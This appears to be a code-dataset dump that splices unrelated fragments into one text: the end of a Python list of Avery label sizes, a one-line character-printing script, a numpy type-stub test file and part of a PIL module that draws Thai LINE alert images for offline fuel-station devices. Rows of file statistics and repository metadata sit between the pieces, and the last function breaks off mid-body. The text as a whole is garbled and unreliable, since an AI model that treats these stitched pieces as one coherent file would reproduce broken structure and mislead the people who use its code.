{'L7650': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7651': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7651P': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7651Y': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7654': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L7655': {'id': 'LP12/89', 'shape': 'round_rectangle', 'number': 12, 'width': 89, 'height': 42}},
{'L7656': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'L7657': {'id': 'LP270/18', 'shape': 'rectangle', 'number': 270, 'width': 17.8, 'height': 10}},
{'L7658': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L7660': {'id': 'LPCD116', 'shape': 'circle', 'number': 2, 'width': 116, 'height': 116}},
{'L7664': {'id': 'LP8/71', 'shape': 'rectangle', 'number': 8, 'width': 71, 'height': 70}},
{'L7665': {'id': 'LP24/72', 'shape': 'rectangle', 'number': 24, 'width': 72, 'height': 21.11}},
{'L7666': {'id': 'LP10/70', 'shape': 'rectangle', 'number': 10, 'width': 70, 'height': 52}},
{'L7667': {'id': 'LP9/133', 'shape': 'rectangle', 'number': 9, 'width': 133, 'height': 29.6}},
{'L7668': {'id': 'LP15/59', 'shape': 'rectangle', 'number': 15, 'width': 59, 'height': 51}},
{'L7670': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7670R': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7670Y': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7671': {'id': 'LP12/76', 'shape': 'rectangle', 'number': 12, 'width': 76.2, 'height': 46.4}},
{'L7674': {'id': 'LP16/145', 'shape': 'rectangle', 'number': 16, 'width': 145, 'height': 17}},
{'L7676': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7678': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7680': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7690': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7701': {'id': 'LP4/192', 'shape': 'rectangle', 'number': 4, 'width': 192, 'height': 62}},
{'L7760': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7765': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7765': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7768': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7768': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7769': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L7776': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7780': {'id': 'LP24/40R', 'shape': 'circle', 'number': 24, 'width': 40, 'height': 40}},
{'L7781': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L7782': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7783': {'id': 'LP10/96', 'shape': 'rectangle', 'number': 10, 'width': 96, 'height': 50.8}},
{'L7784': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7784': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7784': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7860': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L7960': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7962': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'L7963': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7965': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7965': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7966': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'L7973': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7973': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7990': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7990': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7990R': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7990R': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7992': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7992': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7993': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7993': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7994': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L7995': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'L7996': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7996': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7997': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'LR3463': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'LR3475': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'LR3478': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'LR3478': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'LR3478': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'LR3655': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'LR4760': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'LR4761': {'id': 'LP4/192', 'shape': 'rectangle', 'number': 4, 'width': 192, 'height': 62}},
{'LR7159': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'LR7160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'LR7162': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'LR7163': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'LR7165': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'LR7165': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'LR7167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'LR7168': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'LR7168': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'LR7651': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'M3483': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'M3490': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'M8167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'M8359': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'M8360': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'MP7160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'MP7163': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'S161006R': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
]
"""
from avery import labels
for l in labels:
    # print(l.keys(), list(l.values())[0].keys())
    if 'width' not in list(l.values())[0]:
        print(l.keys())
"""
| 96.40812 | 102 | 0.516191 | 5,848 | 45,119 | 3.982045 | 0.088406 | 0.247992 | 0.328939 | 0.082063 | 0.894576 | 0.886804 | 0.886804 | 0.880663 | 0.880663 | 0.880663 | 0 | 0.178666 | 0.152486 | 45,119 | 467 | 103 | 96.614561 | 0.43032 | 0.000931 | 0 | 0.004386 | 0 | 0 | 0.452313 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
823d772ef5fa06975d30787e4a25e0cf2806436a | 27 | py | Python | atten3.py | SathmanGazi/Python- | ae170110d35c2eccb042375288f112ba7171d080 | [
"Apache-2.0"
] | null | null | null | atten3.py | SathmanGazi/Python- | ae170110d35c2eccb042375288f112ba7171d080 | [
"Apache-2.0"
] | null | null | null | atten3.py | SathmanGazi/Python- | ae170110d35c2eccb042375288f112ba7171d080 | [
"Apache-2.0"
] | null | null | null |
print(chr(0x00E7))  # code point U+00E7 -> 'ç'
| 6.75 | 22 | 0.62963 | 3 | 27 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0.222222 | 27 | 3 | 23 | 9 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
82450dfaf8857de6db94ebf43cd002fd4821edbe | 2,848 | py | Python | tests/reveal/fromnumeric.py | analog-garage/numpy-stubs | 201115370a0c011d879d69068b60509accc7f750 | [
"BSD-3-Clause"
] | null | null | null | tests/reveal/fromnumeric.py | analog-garage/numpy-stubs | 201115370a0c011d879d69068b60509accc7f750 | [
"BSD-3-Clause"
] | null | null | null | tests/reveal/fromnumeric.py | analog-garage/numpy-stubs | 201115370a0c011d879d69068b60509accc7f750 | [
"BSD-3-Clause"
] | null | null | null | """Tests for :mod:`numpy.core.fromnumeric`."""
import numpy as np
A = np.array(True, ndmin=2, dtype=bool)
B = np.array(1.0, ndmin=2, dtype=np.float32)
A.setflags(write=False)
B.setflags(write=False)
a = np.bool_(True)
b = np.float32(1.0)
c = 1.0
reveal_type(np.take(a, 0)) # E: numpy.bool_
reveal_type(np.take(b, 0)) # E: numpy.float32
reveal_type(
np.take(c, 0) # E: Union[numpy.generic, datetime.datetime, datetime.timedelta]
)
reveal_type(
np.take(A, 0) # E: Union[numpy.generic, datetime.datetime, datetime.timedelta]
)
reveal_type(
np.take(B, 0) # E: Union[numpy.generic, datetime.datetime, datetime.timedelta]
)
reveal_type(
np.take( # E: Union[numpy.generic, datetime.datetime, datetime.timedelta, numpy.ndarray]
A, [0]
)
)
reveal_type(
np.take( # E: Union[numpy.generic, datetime.datetime, datetime.timedelta, numpy.ndarray]
B, [0]
)
)
reveal_type(np.reshape(a, 1)) # E: numpy.ndarray
reveal_type(np.reshape(b, 1)) # E: numpy.ndarray
reveal_type(np.reshape(c, 1)) # E: numpy.ndarray
reveal_type(np.reshape(A, 1)) # E: numpy.ndarray
reveal_type(np.reshape(B, 1)) # E: numpy.ndarray
reveal_type(np.choose(a, [True])) # E: numpy.bool_
reveal_type(np.choose(b, [1.0])) # E: numpy.float32
reveal_type(
np.choose( # E: Union[numpy.generic, datetime.datetime, datetime.timedelta]
c, [1.0]
)
)
reveal_type(np.choose(A, [True])) # E: numpy.ndarray
reveal_type(np.choose(B, [1.0])) # E: numpy.ndarray
reveal_type(np.repeat(a, 1)) # E: numpy.ndarray
reveal_type(np.repeat(b, 1)) # E: numpy.ndarray
reveal_type(np.repeat(c, 1)) # E: numpy.ndarray
reveal_type(np.repeat(A, 1)) # E: numpy.ndarray
reveal_type(np.repeat(B, 1)) # E: numpy.ndarray
# TODO: Add tests for np.put()
reveal_type(np.swapaxes(A, 0, 0)) # E: numpy.ndarray
reveal_type(np.swapaxes(B, 0, 0)) # E: numpy.ndarray
reveal_type(np.transpose(a)) # E: numpy.ndarray
reveal_type(np.transpose(b)) # E: numpy.ndarray
reveal_type(np.transpose(c)) # E: numpy.ndarray
reveal_type(np.transpose(A)) # E: numpy.ndarray
reveal_type(np.transpose(B)) # E: numpy.ndarray
reveal_type(np.partition(a, 0)) # E: numpy.ndarray
reveal_type(np.partition(b, 0)) # E: numpy.ndarray
reveal_type(np.partition(c, 0)) # E: numpy.ndarray
reveal_type(np.partition(A, 0)) # E: numpy.ndarray
reveal_type(np.partition(B, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(a, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(b, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(c, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(A, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(B, 0)) # E: numpy.ndarray
reveal_type(np.sort(A, 0)) # E: numpy.ndarray
reveal_type(np.sort(B, 0)) # E: numpy.ndarray
reveal_type(np.argsort(A, 0)) # E: numpy.ndarray
reveal_type(np.argsort(B, 0)) # E: numpy.ndarray
| 33.116279 | 93 | 0.687149 | 475 | 2,848 | 4.023158 | 0.094737 | 0.225013 | 0.270016 | 0.308216 | 0.880167 | 0.871795 | 0.861852 | 0.810047 | 0.661957 | 0.63056 | 0 | 0.023237 | 0.138694 | 2,848 | 85 | 94 | 33.505882 | 0.755809 | 0.387289 | 0 | 0.115942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0 | false | 0 | 0.014493 | 0 | 0.014493 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ec0f5398908a3bd8e3d858fa645670f55adba148 | 30,017 | py | Python | linebot/creating_picture_for_line_notify.py | ThebiggunSeeoil/VIS-MASTER | a54a5f321cfe8b258bacc25458490c5b154edf19 | [
"MIT"
] | null | null | null | linebot/creating_picture_for_line_notify.py | ThebiggunSeeoil/VIS-MASTER | a54a5f321cfe8b258bacc25458490c5b154edf19 | [
"MIT"
] | null | null | null | linebot/creating_picture_for_line_notify.py | ThebiggunSeeoil/VIS-MASTER | a54a5f321cfe8b258bacc25458490c5b154edf19 | [
"MIT"
] | null | null | null | import io
import urllib.parse
import sys
import time
import datetime
import os
from PIL import Image, ImageDraw, ImageFont
class creating_picture_for_line_notify():
def CreatingPictureForVis(device,line_data,site_profile,Status):
print('device is', device)
if device == 'VIS' :
if Status == 'OFF-LINE':
Header_type = 'VIS : OFFLINE'
Header_IP_TYPE = 'VIS : IP '
Status = 'OFF-LINE'
color_status = 'rgb(255,0,0)'
elif Status == 'ON-LINE':
Header_type = 'VIS : ONLINE'
Header_IP_TYPE = 'VIS : IP '
Status = 'ON-LINE'
color_status = 'rgb(124,252,0)'
print ('header is',Header_type)
if Status == 'OFF-LINE' :
result_site = site_profile # return value from linebot/connect_db_profile/get_site_profile
day_loss = line_data[0] # linebot/calculate_function/different_time_calculate returns 5 values; index 0
hours_loss = line_data[1] # index 1 of the 5 returned values
minutes_loss = line_data[2] # index 2 of the 5 returned values
datetime_now = line_data[3] # index 3 of the 5 returned values
VIS_last_time = line_data[4] # index 4 of the 5 returned values
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((490,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.station_ip), fill=color, font=fnt_report_name)
draw.text((140,780), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,780), Status, fill=color_status, font=fnt_report_name)
draw.text((140,880), 'ติดต่อไม่ได้เมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 880), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140,980), 'ติดต่อได้ครั้งล่าสุด ' , fill=color, font=fnt_report_name)
draw.text((980, 980), str(VIS_last_time), fill=color, font=fnt_report_name)
draw.text((140,1080), 'ขาดการติดต่อนาน ' , fill=color, font=fnt_report_name)
draw.text((890, 1080), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1180), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1180), str('คุณ : '+result_site.site.team_support.team_name), fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +'dt_save'+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
elif Status == 'ON-LINE' :
result_site = site_profile # return value from linebot/connect_db_profile/get_site_profile
day_loss = line_data[0] # linebot/calculate_function/different_time_calculate returns 5 values; index 0
hours_loss = line_data[1] # index 1 of the 5 returned values
minutes_loss = line_data[2] # index 2 of the 5 returned values
datetime_now = line_data[3] # index 3 of the 5 returned values
VIS_last_time = line_data[4] # index 4 of the 5 returned values
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((490,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.station_ip), fill=color, font=fnt_report_name)
draw.text((140,780), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,780), Status, fill=color_status, font=fnt_report_name)
draw.text((140,880), 'ติดต่อไม่ได้เมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 880), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140,980), 'ติดต่อได้แล้วเมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 980), str(VIS_last_time), fill=color, font=fnt_report_name)
draw.text((140,1080), 'ขาดการติดต่อรวม ' , fill=color, font=fnt_report_name)
draw.text((890, 1080), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1180), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1180), str('คุณ : '+result_site.site.team_support.team_name), fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +'dt_save'+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
def CreatingPictureForMWGT(device,line_data,site_profile,Status):
print('device is', device)
if device == 'MWGT' :
if Status == 'OFF-LINE':
Header_type = 'MWGT : OFFLINE'
Header_IP_TYPE = 'MWGT : IP '
Status = 'OFF-LINE'
color_status = 'rgb(255,0,0)'
elif Status == 'ON-LINE':
Header_type = 'MWGT : ONLINE'
Header_IP_TYPE = 'MWGT : IP '
Status = 'ON-LINE'
color_status = 'rgb(124,252,0)'
if Status == 'OFF-LINE' :
result_site = site_profile[1] # return value from linebot/connect_db_profile/get_site_profile
day_loss = line_data[0] # linebot/calculate_function/different_time_calculate returns 5 values; index 0
hours_loss = line_data[1] # index 1 of the 5 returned values
minutes_loss = line_data[2] # index 2 of the 5 returned values
datetime_now = line_data[3] # index 3 of the 5 returned values
VIS_last_time = line_data[4] # index 4 of the 5 returned values
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((490,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,780), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,780), Status, fill=color_status, font=fnt_report_name)
draw.text((140,880), 'ติดต่อไม่ได้เมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 880), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140,980), 'ติดต่อได้ครั้งล่าสุด ' , fill=color, font=fnt_report_name)
draw.text((980, 980), str(VIS_last_time), fill=color, font=fnt_report_name)
draw.text((140,1080), 'ขาดการติดต่อนาน ' , fill=color, font=fnt_report_name)
draw.text((890, 1080), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1180), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1180), str('คุณ : '+result_site.site.team_support.team_name), fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'MWGT-OFFLINE-' +dt_save+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
elif Status == 'ON-LINE' :
result_site = site_profile # return value from linebot/connect_db_profile/get_site_profile
day_loss = line_data[0] # linebot/calculate_function/different_time_calculate returns 5 values; index 0
hours_loss = line_data[1] # index 1 of the 5 returned values
minutes_loss = line_data[2] # index 2 of the 5 returned values
datetime_now = line_data[3] # index 3 of the 5 returned values
Error_start = line_data[4] # index 4 of the 5 returned values
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((490,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,780), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,780), Status, fill=color_status, font=fnt_report_name)
draw.text((140,880), 'ติดต่อไม่ได้เมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 880), str(Error_start), fill=color, font=fnt_report_name)
draw.text((140,980), 'ติดต่อได้แล้วเมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 980), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140,1080), 'ขาดการติดต่อรวม ' , fill=color, font=fnt_report_name)
draw.text((890, 1080), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1180), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1180), str('คุณ : '+result_site.site.team_support.team_name), fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'MWGT-ONLINE-' +dt_save+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
def CreatingPictureForNOZZLE(device,line_data,site_profile,Status):
print('device is', device)
if device == 'NOZZLE' :
if Status == 'OFF-LINE':
Header_type = 'NOZZLE : OFFLINE'
Header_IP_TYPE = 'MWGT : IP '
Status = 'OFF-LINE'
color_status = 'rgb(255,0,0)'
elif Status == 'ON-LINE':
Header_type = 'NOZZLE : ONLINE'
Header_IP_TYPE = 'MWGT : IP '
Status = 'ON-LINE'
color_status = 'rgb(124,252,0)'
if Status == 'OFF-LINE' :
result_site = site_profile # return value from linebot/connect_db_profile/get_site_profile
day_loss = line_data[0] # linebot/calculate_function/different_time_calculate returns 5 values; index 0
hours_loss = line_data[1] # index 1 of the 5 returned values
minutes_loss = line_data[2] # index 2 of the 5 returned values
datetime_now = line_data[3] # index 3 of the 5 returned values
Error_start = line_data[4] # index 4 of the 5 returned values
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
